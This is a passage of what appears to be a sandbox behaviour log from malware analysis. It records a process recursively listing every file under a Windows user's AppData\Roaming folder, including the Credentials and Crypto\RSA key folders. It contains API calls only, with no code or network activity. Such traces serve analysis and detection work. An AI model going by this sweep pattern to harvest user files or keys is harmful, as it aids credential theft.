pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Identities\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Identities\\*" [0083.184] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Identities\\*", lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 0x586b60 [0083.184] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 1 [0083.184] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 1 [0083.184] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Identities", pszFile="{31810C36-5D23-4CCE-A3B4-316DED195C38}" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}" [0083.184] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\*" [0083.184] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.184] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.184] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0 [0083.184] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.184] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 0 [0083.184] FindClose (in: hFindFile=0x586b60 | out: hFindFile=0x586b60) returned 1 [0083.184] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e268 | out: lpFindFileData=0x18e268) returned 1 [0083.184] PathMatchSpecW (pszFile="iuoldw.exe", pszSpec="*") returned 1 [0083.184] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e268 | out: lpFindFileData=0x18e268) returned 1 [0083.184] PathMatchSpecW (pszFile="jzyu_DZ Ndc.odt", pszSpec="*") returned 1 [0083.184] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e268 | out: lpFindFileData=0x18e268) returned 1 [0083.184] PathMatchSpecW (pszFile="KRCwaFRvShw3yRI.swf", pszSpec="*") returned 1 [0083.184] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e268 | out: lpFindFileData=0x18e268) returned 1 [0083.184] PathCombineW (in: pszDest=0x18e4b8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming", pszFile="Macromedia" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia" [0083.184] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\*" [0083.184] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\*", lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 0x586b60 [0083.184] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 1 [0083.184] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 1 [0083.184] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia", pszFile="Flash Player" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player" [0083.184] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\*" [0083.184] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.185] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.185] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.185] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player", pszFile="macromedia.com" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com" [0083.185] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\*" [0083.185] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\*", lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0x586be0 [0083.185] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.185] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.185] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com", pszFile="support" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support" [0083.185] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\*" [0083.185] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\*", lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0x586c20 [0083.185] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 1 [0083.185] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 1 [0083.185] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support", pszFile="flashplayer" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer" [0083.185] PathCombineW (in: pszDest=0x18ce10, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\*" [0083.185] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\*", lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 0x586c60 [0083.185] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 1 [0083.185] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 1 [0083.185] PathCombineW (in: pszDest=0x18ce10, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer", pszFile="sys" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys" [0083.185] PathCombineW (in: pszDest=0x18c988, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\*" [0083.185] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\*", lpFindFileData=0x18c738 | out: lpFindFileData=0x18c738) returned 0x586ca0 [0083.185] FindNextFileW (in: hFindFile=0x586ca0, lpFindFileData=0x18c738 | out: lpFindFileData=0x18c738) returned 1 [0083.185] FindNextFileW (in: hFindFile=0x586ca0, lpFindFileData=0x18c738 | out: lpFindFileData=0x18c738) returned 1 [0083.185] PathMatchSpecW (pszFile="settings.sol", pszSpec="*") returned 1 [0083.185] FindNextFileW (in: hFindFile=0x586ca0, lpFindFileData=0x18c738 | out: lpFindFileData=0x18c738) returned 0 [0083.185] FindClose (in: hFindFile=0x586ca0 | out: hFindFile=0x586ca0) returned 1 [0083.185] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 0 [0083.185] FindClose (in: hFindFile=0x586c60 | out: hFindFile=0x586c60) returned 1 [0083.185] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0 [0083.185] FindClose (in: hFindFile=0x586c20 | out: hFindFile=0x586c20) returned 1 [0083.185] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0 [0083.185] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.185] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0 [0083.186] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.186] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 0 [0083.186] FindClose (in: hFindFile=0x586b60 | out: hFindFile=0x586b60) returned 1 [0083.186] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e268 | out: lpFindFileData=0x18e268) returned 1 [0083.186] PathCombineW (in: pszDest=0x18e4b8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming", pszFile="Microsoft" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft" [0083.186] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\*" [0083.186] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\*", lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 0x586b60 [0083.186] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 1 [0083.186] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 1 [0083.186] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft", pszFile="Access" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Access") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Access" [0083.186] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Access", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Access\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Access\\*" [0083.186] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Access\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.187] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.187] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.187] PathMatchSpecW (pszFile="AccessCache.accdb", pszSpec="*") returned 1 [0083.187] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.187] PathMatchSpecW (pszFile="AccessCache.laccdb", pszSpec="*") returned 1 [0083.187] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.187] PathMatchSpecW (pszFile="System.mdw", pszSpec="*") returned 1 [0083.187] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0 [0083.187] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.187] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 1 [0083.187] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft", pszFile="AddIns" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\AddIns") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\AddIns" [0083.187] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\AddIns", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\AddIns\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\AddIns\\*" [0083.187] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\AddIns\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.187] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.187] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0 [0083.187] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.188] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 1 [0083.188] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft", pszFile="Bibliography" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Bibliography") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Bibliography" [0083.188] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Bibliography", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Bibliography\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Bibliography\\*" [0083.188] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Bibliography\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.188] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.188] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.188] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Bibliography", pszFile="Style" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Bibliography\\Style") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Bibliography\\Style" [0083.188] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Bibliography\\Style", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\*" [0083.188] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\*", lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0x586be0 [0083.189] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.189] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.189] PathMatchSpecW (pszFile="APASixthEditionOfficeOnline.xsl", pszSpec="*") returned 1 [0083.189] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.189] PathMatchSpecW (pszFile="CHICAGO.XSL", pszSpec="*") returned 1 [0083.189] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.189] PathMatchSpecW (pszFile="GB.XSL", pszSpec="*") returned 1 [0083.189] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.189] PathMatchSpecW (pszFile="GostName.XSL", pszSpec="*") returned 1 [0083.189] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.189] PathMatchSpecW (pszFile="GostTitle.XSL", pszSpec="*") returned 1 [0083.189] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.189] PathMatchSpecW (pszFile="HarvardAnglia2008OfficeOnline.xsl", pszSpec="*") returned 1 [0083.189] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.189] PathMatchSpecW (pszFile="IEEE2006OfficeOnline.xsl", pszSpec="*") returned 1 [0083.189] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.189] PathMatchSpecW (pszFile="ISO690.XSL", pszSpec="*") returned 1 [0083.189] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.189] PathMatchSpecW (pszFile="ISO690Nmerical.XSL", pszSpec="*") returned 1 [0083.189] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.189] PathMatchSpecW (pszFile="MLASeventhEditionOfficeOnline.xsl", pszSpec="*") returned 1 [0083.189] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.189] PathMatchSpecW (pszFile="SIST02.XSL", pszSpec="*") returned 1 [0083.189] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.189] PathMatchSpecW (pszFile="TURABIAN.XSL", pszSpec="*") returned 1 [0083.189] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0 [0083.189] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.190] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0 [0083.190] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.190] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 1 [0083.190] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft", pszFile="Credentials" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Credentials") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Credentials" [0083.190] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Credentials", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Credentials\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Credentials\\*" [0083.190] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Credentials\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.190] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.190] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0 [0083.190] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.190] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 1 [0083.190] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft", pszFile="Crypto" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Crypto") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Crypto" [0083.190] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Crypto", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Crypto\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Crypto\\*" [0083.190] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Crypto\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.190] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.190] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.190] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Crypto", pszFile="RSA" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA" [0083.190] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\*" [0083.190] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\*", lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0x586be0 [0083.190] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.190] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.190] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA", pszFile="S-1-5-21-2345716840-1148442690-1481144037-1000" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-2345716840-1148442690-1481144037-1000") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-2345716840-1148442690-1481144037-1000" [0083.190] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-2345716840-1148442690-1481144037-1000", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-2345716840-1148442690-1481144037-1000\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-2345716840-1148442690-1481144037-1000\\*" [0083.191] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-2345716840-1148442690-1481144037-1000\\*", lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0x586c20 [0083.192] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 1 [0083.192] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 1 [0083.192] PathMatchSpecW (pszFile="83aa4cc77f591dfc2374580bbd95f6ba_500c0908-381e-49dc-a6a0-1a800e9a56e0", pszSpec="*") returned 1 [0083.192] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 1 [0083.192] PathMatchSpecW (pszFile="8b5db95fe05dd9b00e55df22e826ce4d_500c0908-381e-49dc-a6a0-1a800e9a56e0", pszSpec="*") returned 1 [0083.192] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0 [0083.192] FindClose (in: hFindFile=0x586c20 | out: hFindFile=0x586c20) returned 1 [0083.192] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0 [0083.192] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.192] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0 [0083.192] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.192] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 1 [0083.192] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft", pszFile="Document Building Blocks" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Document Building Blocks") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Document Building Blocks" [0083.193] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Document Building Blocks", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\*") 